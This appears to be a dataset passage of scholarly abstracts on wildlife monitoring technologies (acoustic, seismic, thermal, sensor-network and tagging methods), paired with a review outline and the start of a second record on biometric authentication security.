chronology, calling frequency, and calling intensity at 31 breeding ponds in southern Rhode Island in 1998. Four distinct sampling periods were needed to monitor the seven species we detected. During a species' peak sampling period, males of some species called only sporadically within our 16-min surveys, such as pickerel frogs (Rana palustris), whereas other species called continually [spring peepers (Pseudacris crucifer) and green frogs (Rana clamitans)]. Based on accumulation curves, we suggest that call surveys in Rhode Island be conducted for 10-min at breeding ponds to have a high probability of detecting all species. Assuming we conduct one call survey annually during the four sampling periods, a power analysis estimated that we need to conduct 283 or 690 10-min surveys annually to detect 10% or 5% annual declines, respectively, to monitor most anurans in Rhode Island. Common species that are widespread and call frequently could be monitored with road-based call surveys. However, rarer species or those that call infrequently would be difficult to monitor with call surveys in Rhode Island; therefore other monitoring methods might be more appropriate. --- paper_title: Territorial dynamics of Mexican Ant-thrushes Formicarius moniliger revealed by individual recognition of their songs paper_content: The ability to monitor interactions between individuals over time can provide us with information on life histories, mating systems, behavioural interactions between individuals and ecological interactions with the environment. Tracking individuals over time has traditionally been a time- and often a cost-intensive exercise, and certain types of animals are particularly hard to monitor. Here we use canonical discriminant analysis (CDA) to identify individual Mexican Ant-thrushes using data extracted with a semi-automated procedure from song recordings. We test the ability of CDA to identify individuals over time, using recordings obtained over a 4-year period. CDA correctly identified songs of 12 individual birds 93.3% of the time from recordings in one year (2009), while including songs of 18 individuals as training data. Predicting singers in one year using recordings from other years indicated some instances of variation, with correct classification in the range of 67–88%; one individual was responsible for the great majority (66%) of classification errors. We produce temporal maps of the study plot showing that considerably more information was provided by identifying individuals from their songs than by ringing and re-sighting colour-ringed individuals. The spatial data show site fidelity in males, but medium-term pair bonds and an apparently large number of female floaters. Recordings can be used to monitor intra- and intersexual interactions of animals, their movements over time, their interactions with the environment and their population dynamics. --- paper_title: Tracking multiple animals in wildlife footage paper_content: We describe a method for tracking animals in wildlife footage. It uses a CONDENSATION particle filtering frame-work driven by learnt characteristics of specific animals. The key contribution is a periodic model of animal motion based on the relative positions over time of trackable features at significant body points. We also introduce techniques for maintaining a multimodal state density within the particle filter over time to enable consistent tracking of multiple animals. Initial experiments show that the approach has considerable potential. --- paper_title: New seismic unattended small size module for footstep and light and heavy vehicles detection and identification paper_content: General Sensing Systems (GSS) has developed a new seismic, unattended small size module that detects and identifies not only human footsteps but also light and heavy vehicles with near zero false alarm rates. This module has extremely low power consumption and can operate for several months using standard commercial batteries. This paper describes the design of this module that can communicate with any radio transducer or computer. We also report on the preliminary lab and field testing that was implemented in various environment conditions. We show that the new unattended, small size detection module demonstrates the same reliable performance as our previous footstep detection systems and has the added capability of detecting and identifying light and heavy vehicles. --- paper_title: Biometric animal databases from field photographs: identification of individual zebra in the wild paper_content: We describe an algorithmic and experimental approach to a fundamental problem in field ecology: computer-assisted individual animal identification. We use a database of noisy photographs taken in the wild to build a biometric database of individual animals differentiated by their coat markings. A new image of an unknown animal can then be queried by its coat markings against the database to determine if the animal has been observed and identified before. Our algorithm, called StripeCodes, efficiently extracts simple image features and uses a dynamic programming algorithm to compare images. We test its accuracy against two different classes of methods: Eigenface, which is based on algebraic techniques, and matching multi-scale histograms of differential image features, an approach from signal processing. StripeCodes performs better than all competing methods for our dataset, and scales well with database size. --- paper_title: Bird migration flight altitudes studied by a network of operational weather radars paper_content: A fully automated method for the detection and quantification of bird migration was developed for operational C-band weather radar, measuring bird density, speed and direction as a function of altitude. These weather radar bird observations have been validated with data from a high-accuracy dedicated bird radar, which was stationed in the measurement volume of weather radar sites in The Netherlands, Belgium and France for a full migration season during autumn 2007 and spring 2008. We show that weather radar can extract near real-time bird density altitude profiles that closely correspond to the density profiles measured by dedicated bird radar. Doppler weather radar can thus be used as a reliable sensor for quantifying bird densities aloft in an operational setting, which—when extended to multiple radars—enables the mapping and continuous monitoring of bird migration flyways. By applying the automated method to a network of weather radars, we observed how mesoscale variability in weather conditions structured the timing and altitude profile of bird migration within single nights. Bird density altitude profiles were observed that consisted of multiple layers, which could be explained from the distinct wind conditions at different take-off sites. Consistently lower bird densities are recorded in The Netherlands compared with sites in France and eastern Belgium, which reveals some of the spatial extent of the dominant Scandinavian flyway over continental Europe. --- paper_title: Application of remote thermal imaging and night vision technology to improve endangered wildlife resource management with minimal animal distress and hazard to humans paper_content: Advanced electromagnetic sensor systems more commonly associated with the hightech military battlefield may be applied to remote surveillance of wildlife. The first comprehensive study of a wide global variety of Near Infra Red (NIR) and thermal wildlife portraits are presented with this technology: for mammals, birds and other animals. The paper illustrates the safety aspects afforded to zoo staff and personnel in the wild during the day and night from potentially lethal and aggressive animals, and those difficult to approach normally. Such remote sensing systems are non-invasive and provide minimal disruption and distress to animals both in captivity and in the wild. We present some of the veterinarian advantages of such all weather day and night systems to identify sickness and injuries at an early diagnostic stage, as well as age related effects and mammalian cancer. Animals have very different textured surfaces, reflective and emissive properties in the NIR and thermal bands than when compared with the visible spectrum. Some surface features may offer biomimetic materials design advantages. --- paper_title: Evaluation of unpleasant odor with a portable electronic nose paper_content: An intelligent multi-sensor system with an entire autonomy, a low weight and a small size has been developed for in situ applications such as environmental pollutant gas detection or olfactory estimation. This portable electronic nose works with commercial metal oxide gas sensors and a microcontroller connected to a compact flash memory as intelligent unit. In this work we present the conception of this electronic nose, its laboratory validation, and a real application which concerns an outdoor air monitoring of a duck breeding. This application is developed in order to quantify continuously discomfort odor spread, causing neighbor complaints. The odor measurements were made using our electronic nose (Nepo) and results are compared to the simultaneous results obtained from other olfactometric techniques. --- paper_title: A line in the sand: A wireless sensor network for target detection, classification, and tracking paper_content: Intrusion detection is a surveillance problem of practical import that is well suited to wireless sensor networks. In this paper, we study the application of sensor networks to the intrusion detection problem and the related problems of classifying and tracking targets. Our approach is based on a dense, distributed, wireless network of multi-modal resource-poor sensors combined into loosely coherent sensor arrays that perform in situ detection, estimation, compression, and exfiltration. We ground our study in the context of a security scenario called "A Line in the Sand" and accordingly define the target, system, environment, and fault models. Based on the performance requirements of the scenario and the sensing, communication, energy, and computation ability of the sensor network, we explore the design space of sensors, signal processing algorithms, communications, networking, and middleware services. We introduce the influence field, which can be estimated from a network of binary sensors, as the basis for a novel classifier. A contribution of our work is that we do not assume a reliable network; on the contrary, we quantitatively analyze the effects of network unreliability on application performance. Our work includes multiple experimental deployments of over 90 sensor nodes at MacDill Air Force Base in Tampa, FL, as well as other field experiments of comparable scale. Based on these experiences, we identify a set of key lessons and articulate a few of the challenges facing extreme scaling to tens or hundreds of thousands of sensor nodes. --- paper_title: Cadence analysis of temporal gait patterns for seismic discrimination between human and quadruped footsteps paper_content: This paper reports on a method of cadence analysis for the discrimination between human and quadruped using a cheap seismic sensor. Previous works in the domain of seismic detection of human vs. quadruped have relied on the fundamental gait frequency. Slow movement of quadrupeds can generate the same fundamental gait frequency as human footsteps therefore causing the recognizer to be confused when quadruped are ambling around the sensor. Here we propose utilizing the cadence analysis of temporal gait pattern which provides information on temporal distribution of the gait beats. We also propose a robust method of extracting temporal gait patterns. Features extracted from gait patterns are modeled with optimum number of Gaussian Mixture Models (GMMs). The performance of the system during the test for discriminating between horse, dog, multiple people walk, and single human walk/run was over 95%. --- paper_title: The Cow Gait Recognition Using CHLAC paper_content: This paper reports the preliminary experiments on the cow identification via gait recognition of motion images. The eight cows walking under two different situations have been precisely identified by Cubic Higher-order Local Auto-Correlation (CHLAC). The cow gait recognition using CHLAC is expected to be a landmark achievement for realizing cost-effective dairy cattle breeding management systems which do not use any sensors and hormone in order to determine the timing of artificial insemination in dairy cattle. --- paper_title: Improved human detection and classification in thermal images paper_content: We present a new method for detecting pedestrians in thermal images. The method is based on the Shape Context Descriptor (SCD) with the Adaboost cascade classifier framework. Compared with standard optical images, thermal imaging cameras offer a clear advantage for night-time video surveillance. It is robust on the light changes in day-time. Experiments show that shape context features with boosting classification provide a significant improvement on human detection in thermal images. In this work, we have also compared our proposed method with rectangle features on the public dataset of thermal imagery [1]. Results show that shape context features are much better than the conventional rectangular features on this task. --- paper_title: Insect pheromones. paper_content: The evidence for intraspecies chemical communication in insects is reviewed, with emphasis on those studies where known organic compounds have been implicated. These signal-carrying chemicals are known as pheromones. There are two distinct types of pheromones, releasers and primers. Releaser pheromones initiate immediate behavioral responses in insects upon reception, while primer pheromones cause physiological changes in an animal that ultimately result in a behavior response. Chemically identified releaser pheromones are of three basic types: those which cause sexual attraction, alarm behavior, and recruitment. Sex pheromones release the entire repertoire of sexual behavior. Thus a male insect may be attracted to and attempt to copulate with an inanimate object that has sex pheromone on it. It appears that most insects are rather sensitive and selective for the sex pheromone of their species. Insects show far less sensitivity and chemospecificity for alarm pheromones. Alarm selectivity is based more on volatility than on unique structural features. Recruiting pheromones are used primarily in marking trails to food sources. Terrestrial insects lay continuous odor trails, whereas bees and other airborne insects apply the substances at discrete intervals. It appears that a complex pheromone system is used by the queen bee in the control of worker behavior. One well-established component of this system is a fatty acid, 9-ketodecenoic acid, produced by the queen and distributed among the workers. This compound prevents the development of ovaries in the workers and inhibits their queen-rearing activities. In addition, the same compound is used by virgin queen bees as a sex attractant. --- paper_title: Acoustic monitoring in terrestrial environments using microphone arrays: applications, technological considerations and prospectus paper_content: Summary 1. Animals produce sounds for diverse biological functions such as defending territories, attracting mates, deterring predators, navigation, finding food and maintaining contact with members of their social group. Biologists can take advantage of these acoustic behaviours to gain valuable insights into the spatial and temporal scales over which individuals and populations interact. Advances in bioacoustic technology, including the development of autonomous cabled and wireless recording arrays, permit data collection at multiple locations over time. These systems are transforming the way we study individuals and populations of animals and are leading to significant advances in our understandings of the complex interactions between animals and their habitats. 2. Here, we review questions that can be addressed using bioacoustic approaches, by providing a primer on technologies and approaches used to study animals at multiple organizational levels by ecologists, behaviourists and conservation biologists. 3. Spatially dispersed groups of microphones (arrays) enable users to study signal directionality on a small scale or to locate animals and track their movements on a larger scale. 4. Advances in algorithm development can allow users to discriminate among species, sexes, age groups and individuals. 5. With such technology, users can remotely and non-invasively survey populations, describe the soundscape, quantify anthropogenic noise, study species interactions, gain new insights into the social dynamics of sound-producing animals and track the effects of factors such as climate change and habitat fragmentation on phenology and biodiversity. 6. There remain many challenges in the use of acoustic monitoring, including the difficulties in performing signal recognition across taxa. The bioacoustics community should focus on developing a --- paper_title: Recognition of moving ground targets by measuring and processing seismic signal paper_content: Abstract Because vehicles moving over ground generate a succession of impacts, the soil disturbances propagate away from the source as seismic waves. Thus, in the battlefield environment, we can detect moving ground vehicles by means of measuring seismic signals using a seismic velocity transducer, and automatically classify and recognize them by advance signal processing method. Because seismic sensor is easy to be developed by emerging micro-electro-mechanical system (MEMS) technology, seismic detection that will be low cost, low power, small volume and light weight is a promising method for moving ground targets. Such a detection method can be used in many different fields, such as battlefield surveillance, traffic monitoring, law enforcement and so on. The paper researches seismic signals of typical vehicle targets in order to extract features of seismic signal and to recognize targets. As a data fusion method, the technique of artificial neural networks (ANN) is applied to recognize seismic signals for vehicle targets. An improved BP algorithm and ANN data fusion architecture have been presented to improve learning speed and avoid local minimum points in error curve. The algorithm had been used for classification and recognition of seismic signals of vehicle targets in the outdoor environment. It can be proven that moving ground vehicles can be detected by measuring seismic signal, feature extraction of target seismic signal is correct and ANN data fusion is effective to solve the recognition and classification problem for moving ground targets. --- paper_title: Acoustic and seismic modalities for unattended ground sensors paper_content: In this paper, we have presented the relative advantages and complementary aspects of acoustic and seismic ground sensors. A detailed description of both acoustic and seismic ground sensing methods has been provided. Acoustic and seismic phenomenology including source mechanisms, propagation paths, attenuation, and sensing have been discussed in detail. The effects of seismo-acoustic and acousto-seismic interactions as well as recommendations for minimizing seismic/acoustic cross talk have been highlighted. We have shown representative acoustic and seismic ground sensor data to illustrate the advantages and complementary aspects of the two modalities. The data illustrate that seismic transducers often respond to acoustic excitation through acousto-seismic coupling. Based on these results, we discussed the implications of this phenomenology on the detection, identification, and localization objectives of unattended ground sensors. We have concluded with a methodology for selecting the preferred modality (acoustic and/or seismic) for a particular application. --- paper_title: Cadence analysis of temporal gait patterns for seismic discrimination between human and quadruped footsteps paper_content: This paper reports on a method of cadence analysis for the discrimination between human and quadruped using a cheap seismic sensor. Previous works in the domain of seismic detection of human vs. quadruped have relied on the fundamental gait frequency. Slow movement of quadrupeds can generate the same fundamental gait frequency as human footsteps therefore causing the recognizer to be confused when quadruped are ambling around the sensor. Here we propose utilizing the cadence analysis of temporal gait pattern which provides information on temporal distribution of the gait beats. We also propose a robust method of extracting temporal gait patterns. Features extracted from gait patterns are modeled with optimum number of Gaussian Mixture Models (GMMs). The performance of the system during the test for discriminating between horse, dog, multiple people walk, and single human walk/run was over 95%. --- paper_title: SEGMENTING QUADRUPED GAIT PATTERNS FROM WILDLIFE VIDEO paper_content: This paper describes a novel approach to detecting walking quadrupeds in unedited wildlife film footage. Variable lighting, moving backgrounds and camouflaged animals make traditional foreground extraction techniques such as optical flow and background subtraction unstable. We track a sparse set of points over a short film clip and use RANSAC to segment the foreground region. A novel technique, employing normalised convolution is then utilised to interpolate dense flow from the sparsely defined foreground. Dense flow is extracted for a number of clips demonstrating quadruped gait and other movements. Principal component analysis (PCA) is applied to this set of dense flows and eigenvectors not encapsulating periodic internal motion characteristics are disregarded. The projection coefficients for the remaining principal components are analysed as one dimensional time series. Projection coefficient variation reflects changes in the velocity and relative alignment of the components of the foreground object. These coefficients' relative phase differences are deduced using spectral analysis and degree of periodicity using dynamic time warping. These parameters are used to train a KNN classifier which segments the training data with 93% success rate. By generating projection coefficients for unseen footage, the system has successfully located examples of quadruped gait previously missed by human observers. --- paper_title: Do ants make direct comparisons? paper_content: Many individual decisions are informed by direct comparison of the alternatives. In collective decisions, however, only certain group members may have the opportunity to compare options. Emigrating ant colonies (Temnothorax albipennis) show sophisticated nest-site choice, selecting superior sites even when they are nine times further away than the alternative. How do they do this? We used radio-frequency identification-tagged ants to monitor individual behaviour. Here we show for the first time that switching between nests during the decision process can influence nest choice without requiring direct comparison of nests. Ants finding the poor nest were likely to switch and find the good nest, whereas ants finding the good nest were more likely to stay committed to that nest. When ants switched quickly between the two nests, colonies chose the good nest. Switching by ants that had the opportunity to compare nests had little effect on nest choice. We suggest a new mechanism of collective nest choice: individuals respond to nest quality by the decision either to commit or to seek alternatives. Previously proposed mechanisms, recruitment latency and nest comparison, can be explained as side effects of this simple rule. Colony-level comparison and choice can emerge, without direct comparison by individuals. --- paper_title: Evolution and sustainability of a wildlife monitoring sensor network paper_content: As sensor network technologies become more mature, they are increasingly being applied to a wide variety of applications, ranging from agricultural sensing to cattle, oceanic and volcanic monitoring. Significant efforts have been made in deploying and testing sensor networks resulting in unprecedented sensing capabilities. A key challenge has become how to make these emerging wireless sensor networks more sustainable and easier to maintain over increasingly prolonged deployments. In this paper, we report the findings from a one year deployment of an automated wildlife monitoring system for analyzing the social co-location patterns of European badgers (Meles meles) residing in a dense woodland environment. We describe the stages of its evolution cycle, from implementation, deployment and testing, to various iterations of software optimization, followed by hardware enhancements, which in turn triggered the need for further software optimization. We report preliminary descriptive analyses of a subset of the data collected, demonstrating the significant potential our system has to generate new insights into badger behavior. The main lessons learned were: the need to factor in the maintenance costs while designing the system; to look carefully at software and hardware interactions; the importance of a rapid initial prototype deployment (this was key to our success); and the need for continuous interaction with domain scientists which allows for unexpected optimizations. --- paper_title: CARNIVORE: a disruption-tolerant system for studying wildlife paper_content: We present CARNIVORE, a system for in situ, unobtrusive monitoring of cryptic, difficult-to-catch/observe wildlife in their natural habitat. CARNIVORE is a network of mobile and static nodes with sensing, processing, storage, and wireless communication capabilities. CARNIVORE's compact, low-power, mobile animal-borne nodes collect sensor data and transmit it to static nodes, which then relay it to the Internet. Depending on the wildlife being studied, the network can be quite sparse and therefore disconnected frequently for arbitrarily long periods of time. To support "disconnected operation", CARNIVORE uses an "opportunistic routing" approach taking advantage of every encounter between nodes (mobile-to-mobile and mobile-to-static) to propagate data. With a lifespan of 50-100 days, a CARNIVORE mobile node, outfitted on a collar, collects and transmits 1 GB of data compared to 450 kB of data from comparable commercially available wildlife collars. Each collar records 3-axis accelerometer and GPS data to infer animal behavior and energy consumption.Testing in both laboratory and free-range settings with domestic dogs shows that galloping and trotting behavior can be identified. Data collected fromfirst deployments on mountain lions (Puma concolor) near Santa Cruz, CA, USA show that the system is a viable and useful tool for wildlife research. --- paper_title: Monitoring Animal Behaviour and Environmental Interactions Using Wireless Sensor Networks, GPS Collars and Satellite Remote Sensing paper_content: Remote monitoring of animal behaviour in the environment can assist in managing both the animal and its environmental impact. GPS collars which record animal locations with high temporal frequency allow researchers to monitor both animal behaviour and interactions with the environment. These ground-based sensors can be combined with remotely-sensed satellite images to understand animal-landscape interactions. The key to combining these technologies is communication methods such as wireless sensor networks (WSNs). We explore this concept using a case-study from an extensive cattle enterprise in northern Australia and demonstrate the potential for combining GPS collars and satellite images in a WSN to monitor behavioural preferences and social behaviour of cattle. --- paper_title: Rapid Prototyping for Wildlife and Ecological Monitoring paper_content: Wildlife tracking and ecological monitoring are important for scientific monitoring, wildlife rehabilitation, disease control, and sustainable ecological development. Yet technologies for both of them are expensive and not scalable. Also it is important to tune the monitoring system parameters for different species to adapt their behavior and gain the best result of monitoring. In this paper, we propose using wireless sensor networks to build both short term and long term wildlife and ecological monitoring systems. For the short term system, everything used is off-the-shelf and can be easily purchased from the market. We suggest that before establishing a large scale wildlife/ecological monitoring network, it is worthwhile to first spend a short period of time constructing a rapid prototype of the targeted network. Through verifying the correctness of the prototype network, ecologists can find potential problems, avoid total system failure, and use the best-tuned parameters for the long-term monitoring network. --- paper_title: Energy-efficient computing for wildlife tracking: design tradeoffs and early experiences with ZebraNet paper_content: Over the past decade, mobile computing and wireless communication have become increasingly important drivers of many new computing applications. The field of wireless sensor networks particularly focuses on applications involving autonomous use of compute, sensing, and wireless communication devices for both scientific and commercial purposes. This paper examines the research decisions and design tradeoffs that arise when applying wireless peer-to-peer networking techniques in a mobile sensor network designed to support wildlife tracking for biology research.The ZebraNet system includes custom tracking collars (nodes) carried by animals under study across a large, wild area; the collars operate as a peer-to-peer network to deliver logged data back to researchers. The collars include global positioning system (GPS), Flash memory, wireless transceivers, and a small CPU; essentially each node is a small, wireless computing device. Since there is no cellular service or broadcast communication covering the region where animals are studied, ad hoc, peer-to-peer routing is needed. Although numerous ad hoc protocols exist, additional challenges arise because the researchers themselves are mobile and thus there is no fixed base station towards which to aim data. Overall, our goal is to use the least energy, storage, and other resources necessary to maintain a reliable system with a very high `data homing' success rate. We plan to deploy a 30-node ZebraNet system at the Mpala Research Centre in central Kenya. More broadly, we believe that the domain-centric protocols and energy tradeoffs presented here for ZebraNet will have general applicability in other wireless and sensor applications. --- paper_title: Animal Behaviour Understanding using Wireless Sensor Networks paper_content: This paper presents research that is being conducted by the Commonwealth Scientific and Industrial Research Organisation (CSIRO) with the aim of investigating the use of wireless sensor networks for automated livestock monitoring and control. It is difficult to achieve practical and reliable cattle monitoring with current conventional technologies due to challenges such as large grazing areas of cattle, long time periods of data sampling, and constantly varying physical environments. Wireless sensor networks bring a new level of possibilities into this area with the potential for greatly increased spatial and temporal resolution of measurement data. CSIRO has created a wireless sensor platform for animal behaviour monitoring where we are able to observe and collect information of animals without significantly interfering with them. Based on such monitoring information, we can identify each animal's behaviour and activities successfully --- paper_title: Wireless indoor tracking network based on Kalman filters with an application to monitoring dairy cows paper_content: We propose an algorithm for estimating positions of devices in a sensor network using Kalman filtering techniques. The specific area of application is monitoring the movements of cows in a barn. The algorithm consists of two filters. The first filter enhances the signal-to-noise ratio of the observed signal strengths and gives interpolated values at specific timestamps. Information from the first filter is transferred to the second filter which estimates the positions. Methods for estimating the parameters of the filters are given and these provide a straightforward calibration of the system. --- paper_title: Identification of animal movement patterns using tri-axial accelerometry paper_content: An animal's behaviour is a response to its environment and physiological condition, and as such, gives vital clues as to its well-being, which is highly relevant in conservation issues. Behav- iour can generally be typified by body motion and body posture, parameters that are both measurable using animal-attached accelerometers. Interpretation of acceleration data, however, can be complex, as the static (indicative of posture) and dynamic (motion) components are derived from the total acceleration values, which should ideally be recorded in all 3-dimensional axes. The principles of tri- axial accelerometry are summarised and discussed in terms of the commonalities that arise in pat- terns of acceleration across species that vary in body pattern, life-history strategy, and the medium they inhabit. Using tri-axial acceleration data from deployments on captive and free-living animals (n = 12 species), behaviours were identified that varied in complexity, from the rhythmic patterns of locomotion, to feeding, and more variable patterns including those relating to social interactions. These data can be combined with positional information to qualify patterns of area-use and map the distribution of target behaviours. The range and distribution of behaviour may also provide insight into the transmission of disease. In this way, the measurement of tri-axial acceleration can provide insight into individual and population level processes, which may ultimately influence the effective- ness of conservation practice. --- paper_title: Smart sensors for small rodent observation paper_content: Working towards the observation of rats (and other small rodents) in the wild we have developed tools that will enable us to study their behavior using a wireless network of wearable sensor nodes. The space and weight constraints resulting from the size of the animals have led to simple but functional approaches for vocalization classification and position estimation. For the resulting data we have developed novel, delay-tolerant routing and collection strategies. These are expected to be used in a sparse, dynamic network resulting from various rats being tagged with our nodes and running around freely - an area that will eventually be too big to be covered solely by stationary data sinks. Furthermore, the system is designed to extract information on the social interactions between animals from the routing data. It currently works in an indoor environment and we are preparing it for tests in a controlled outdoor setup. --- paper_title: ZigBee-based wireless sensor networks for classifying the behaviour of a herd of animals using classification trees paper_content: An in-depth study of wireless sensor networks applied to the monitoring of animal behaviour in the field is described. Herd motion data, such as the pitch angle of the neck and movement velocity, were monitored by an MTS310 sensor board equipped with a 2-axis accelerometer and received signal strength indicator functionality in a single-hop wireless sensor network. Pitch angle measurements and velocity estimates were transmitted through a wireless sensor network based on the ZigBee communication protocol. After data filtering, the pitch angle measurements together with velocity estimates were used to classify the animal behaviour into two classes; as activity and inactivity. Considering all the advantages and drawbacks of classification trees compared to neural network and fuzzy logic classifiers a general classification tree was preferred. The classification tree was constructed based on the measurements of the pitch angle of the neck and movement velocity of some animals in the herd and was used to predict the behaviour of other animals in the herd. The results showed that there was a large improvement in the classification accuracy if both the pitch angle of the neck and the velocity were employed as predictors when compared to just pitch angle or just velocity employed as a single predictor. The classification results showed the possibility of determining a general decision rule which can classify the behaviour of each individual in a herd of animals. The results were confirmed by manual registration and by GPS measurements. --- paper_title: Activity recognition from user-annotated acceleration data paper_content: In this work, algorithms are developed and evaluated to de- tect physical activities from data acquired using five small biaxial ac- celerometers worn simultaneously on different parts of the body. Ac- celeration data was collected from 20 subjects without researcher su- pervision or observation. Subjects were asked to perform a sequence of everyday tasks but not told specifically where or how to do them. Mean, energy, frequency-domain entropy, and correlation of acceleration data was calculated and several classifiers using these features were tested. De- cision tree classifiers showed the best performance recognizing everyday activities with an overall accuracy rate of 84%. The results show that although some activities are recognized well with subject-independent training data, others appear to require subject-specific training data. The results suggest that multiple accelerometers aid in recognition because conjunctions in acceleration feature values can effectively discriminate many activities. With just two biaxial accelerometers - thigh and wrist - the recognition performance dropped only slightly. This is the first work to investigate performance of recognition algorithms with multiple, wire-free accelerometers on 20 activities using datasets annotated by the subjects themselves. ---
Title: Sensing Solutions for Collecting Spatio-Temporal Data for Wildlife Monitoring Applications: A Review Section 1: Introduction Description 1: Write about the importance of animal movement in ecological processes and the challenges of traditional data collection methods. Section 2: Classification of Technologies for Collecting Spatio-Temporal Data Description 2: Explain the two main approaches (Lagrangian and Eulerian) for collecting spatio-temporal data, and the classification of technologies based on these approaches. Section 3: Technologies for Eulerian Approach Description 3: Discuss the technologies utilized for the Eulerian approach, including their modalities, sensors, and data analysis techniques. Section 4: Echoes as a Modality Description 4: Detail the use of radar, sonar, and lidar technologies inspired by animals like bats and dolphins that use echolocation. Section 5: Visual Modality Description 5: Describe how visual data from cameras can be used to identify and track animals, focusing on visual interpretation methods. Section 6: Thermal Sensors (Thermal Receptors) Description 6: Discuss the use of thermal sensors to detect animals based on their infrared radiation and thermal hotspots. Section 7: Chemical Modality Description 7: Explore the use of chemical sensors (electronic noses) for identifying animals based on volatile organic compounds they emit. Section 8: Microphones (Acoustic Receptors) Description 8: Explain the use of microphones to detect and identify animals through their vocal sounds and incidental noises. Section 9: Seismic Modality Description 9: Discuss the detection of animals through seismic waves produced by their movements, particularly footsteps. Section 10: Technologies for the Lagrangian Approach Description 10: Review the tagging technologies (like GPS, RFID) attached directly to animals for collecting spatio-temporal data, and the integration with wireless sensor networks. Section 11: Integrating RFID Technology with Wireless Sensor Networks Description 11: Explain how RFID technology is integrated with wireless sensor networks to enhance data collection and communication. Section 12: Integrating GPS Technology and Wireless Sensor Networks Description 12: Discuss the communication architectures for integrating GPS with wireless sensor networks, focusing on data transmission. Section 13: Integration with Wireless Sensor Networks Description 13: Describe the role of inertial sensors and radio communication in tracking and localizing animals using wireless sensor networks. Section 14: Discussion Description 14: Compare the technologies based on their data provision capabilities, performance metrics, and suitability for wildlife monitoring studies. Section 15: Comparison of Technologies Based on Information They can Provide Description 15: Provide a detailed comparison table of technologies regarding their ability to collect spatio-temporal features. Section 16: Comparison of Technologies Based on Different Performance Metrics Description 16: Compare the technologies in terms of disruptions, processing requirements, commercial availability, and invasiveness. Section 17: Comparison of Technologies Based on the Subject of Study Description 17: Compare the usage of different technologies across various wildlife species. Section 18: Conclusions and Future Directions Description 18: Summarize the current state of sensing technologies and propose future research directions in integrating wireless sensor networks for wildlife monitoring.
A Survey of Security and Privacy Issues for Biometrics Based Remote Authentication in Cloud
8
--- paper_title: Biometrics: a tool for information security paper_content: Establishing identity is becoming critical in our vastly interconnected society. Questions such as "Is she really who she claims to be?," "Is this person authorized to use this facility?," or "Is he in the watchlist posted by the government?" are routinely being posed in a variety of scenarios ranging from issuing a driver's license to gaining entry into a country. The need for reliable user authentication techniques has increased in the wake of heightened concerns about security and rapid advancements in networking, communication, and mobility. Biometrics, described as the science of recognizing an individual based on his or her physical or behavioral traits, is beginning to gain acceptance as a legitimate method for determining an individual's identity. Biometric systems have now been deployed in various commercial, civilian, and forensic applications as a means of establishing identity. In this paper, we provide an overview of biometrics and discuss some of the salient research issues that need to be addressed for making biometric technology an effective tool for providing information security. The primary contribution of this overview includes: 1) examining applications where biometric scan solve issues pertaining to information security; 2) enumerating the fundamental challenges encountered by biometric systems in real-world applications; and 3) discussing solutions to address the problems of scalability and security in large-scale authentication systems. --- paper_title: A Formal Study of the Privacy Concerns in Biometric-based Remote Authentication Schemes ⋆ paper_content: With their increasing popularity in cryptosystems, biometrics have attracted more and more attention from the information security community. However, how to handle the relevant privacy concerns remains to be troublesome. In this paper, we propose a novel security model to formalize the privacy concerns in biometric-based remote authentication schemes. Our security model covers a number of practical privacy concerns such as identity privacy and transaction anonymity, which have not been formally considered in the literature. In addition, we propose a general biometric-based remote authentication scheme and prove its security in our security model. --- paper_title: Biometric Systems: Privacy and Secrecy Aspects paper_content: This paper addresses privacy leakage in biometric secrecy systems. Four settings are investigated. The first one is the standard Ahlswede-Csiszar secret-generation setting in which two terminals observe two correlated sequences. They form a common secret by interchanging a public message. This message should only contain a negligible amount of information about the secret, but here, in addition, we require it to leak as little information as possible about the biometric data. For this first case, the fundamental tradeoff between secret-key and privacy-leakage rates is determined. Also for the second setting, in which the secret is not generated but independently chosen, the fundamental secret-key versus privacy-leakage rate balance is found. Settings three and four focus on zero-leakage systems. Here the public message should only contain a negligible amount of information on both the secret and the biometric sequence. To achieve this, a private key is needed, which can only be observed by the terminals. For both the generated-secret and the chosen-secret model, the regions of achievable secret-key versus private-key rate pairs are determined. For all four settings, the fundamental balance is determined for both unconditional and conditional privacy leakage. --- paper_title: A Quantitative Survey of various Fingerprint Enhancement techniques paper_content: Preprocessing is an important step in the area of image processing and pattern recognition. This paper aims to present a review of recent as well as classic fingerprint image enhancement techniques. The umbrella of techniques used for evaluation varies from histogram based enhancement, frequency transformation based, Gabor filter based enhancement and its variants to composite enhancement technique. The effectiveness of enhancement techniques proposed by various researchers is evaluated on the basis of peak signal to noise ratio and equal error rate which refers to robustness and stability of identification process. Experimental results shows that incorporating the enhancement technique based on Gabor filter in wavelet domain and composite method improves equal error rate .Improved error rate and peak signal noise ratio improves the identification/verification accuracy marginally. The major goal of the paper is to provide a comprehensive reference source for the researchers involved in enhancement of fingerprint images which is essential preprocessing step in automatic fingerprint identification and verification. --- paper_title: Check Your Biosignals Here: A new dataset for off-the-person ECG biometrics paper_content: The Check Your Biosignals Here initiative (CYBHi) was developed as a way of creating a dataset and consistently repeatable acquisition framework, to further extend research in electrocardiographic (ECG) biometrics. In particular, our work targets the novel trend towards off-the-person data acquisition, which opens a broad new set of challenges and opportunities both for research and industry. While datasets with ECG signals collected using medical grade equipment at the chest can be easily found, for off-the-person ECG data the solution is generally for each team to collect their own corpus at considerable expense of resources. In this paper we describe the context, experimental considerations, methods, and preliminary findings of two public datasets created by our team, one for short-term and another for long-term assessment, with ECG data collected at the hand palms and fingers. --- paper_title: Efficient fingerprint search based on database clustering paper_content: Fingerprint identification has been a great challenge due to its complex search of database. This paper proposes an efficient fingerprint search algorithm based on database clustering, which narrows down the search space of fine matching. Fingerprint is non-uniformly partitioned by a circular tessellation to compute a multi-scale orientation field as the main search feature. The average ridge distance is employed as an auxiliary feature. A modified K-means clustering technique is proposed to partition the orientation feature space into clusters. Based on the database clustering, a hierarchical query processing is proposed to facilitate an efficient fingerprint search, which not only greatly speeds up the search process but also improves the retrieval accuracy. The experimental results show the effectiveness and superiority of the proposed fingerprint search algorithm. --- paper_title: Fusion of electrocardiogram with unobtrusive biometrics: An efficient individual authentication system paper_content: This paper explores the effectiveness of a novel multibiometric system that is resulted from the fusion of the electrocardiogram (ECG) with an unobtrusive biometric face and another biometric fingerprint which is known to be a least obtrusive for efficient individual authentication. The unimodal systems of the face and the fingerprint biometrics are neither secure nor they can achieve the optimum performance. Using the ECG signal as one of the biometrics offer advantage to a multibiometric system that ECG is inherited to an individual which is confidential, secured and difficult to be forged. It has an inherent feature of vitality signs that ensures a strong protection against spoof attacks to the system. Transformation based score fusion 